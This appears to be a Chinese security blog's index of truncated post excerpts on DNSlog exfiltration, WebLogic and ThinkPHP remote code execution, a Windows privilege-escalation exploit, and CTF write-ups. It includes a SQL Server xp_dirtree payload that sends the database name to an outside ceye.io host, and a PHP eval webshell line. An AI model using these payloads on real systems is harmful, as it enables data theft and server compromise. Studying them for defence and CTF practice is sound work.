DECLARE @host varchar(128); SELECT @host=(select db_name())+ '.hfkzaq.ceye.io'; select @host; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); ...

DNSLOG的原理 DNS的解析是递归与迭代相结合的，下面给出了当我们访问 www.o2oxy.cn 时. 最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一...

github: https://github.com/Liang2580/chunked-coding-converter jar 如下： 11111111

漏洞描述： 北京时间2018年10月17日，Oracle官方发布的10月关键补充更新CPU（重要补丁更新）中修复了一个高危的WebLogic远程代码执行漏洞（CVE-2018-3191）。 该漏洞允许未经身份验证的攻击者通过T3协...

https://github.com/unamer/CVE-2018-8120 CVE-2018-8120 CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64...

ThinkPHP 5.0.23 修复了一个代码执行的漏洞。之后Thinkphp 更新到5.0.24  这次代码执行的影响范围5.x <= 5.0.23   测试中我用的是5.0.23  安装...

Web 1.超简单 http://gxnnctf.gxsosec.cn:12311/    看NO参数，匹配正则，白名单且长度大于1就那么就会返回flag 传参/?NO=01 即得到flag    ...

xss代码分析 eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee 你就是看不到。哈哈啊哈哈哈 你就是看不到。哈哈啊哈哈哈 你就是看...

1.tets 2、2000字的检讨 复制出来提交 flag: SYC{evoA_Y0ur_JusT_3Scap3_Th3_Jav4scr1pt_l1m1T} 3、幸运...

<script language="php">@eval_r($_POST[sb])</script> 唔，学习了一波。 这道题目的去掉了, 不能用if(exp1,exp2,exp3)的方式。 然后我就恶补了一下 case when the...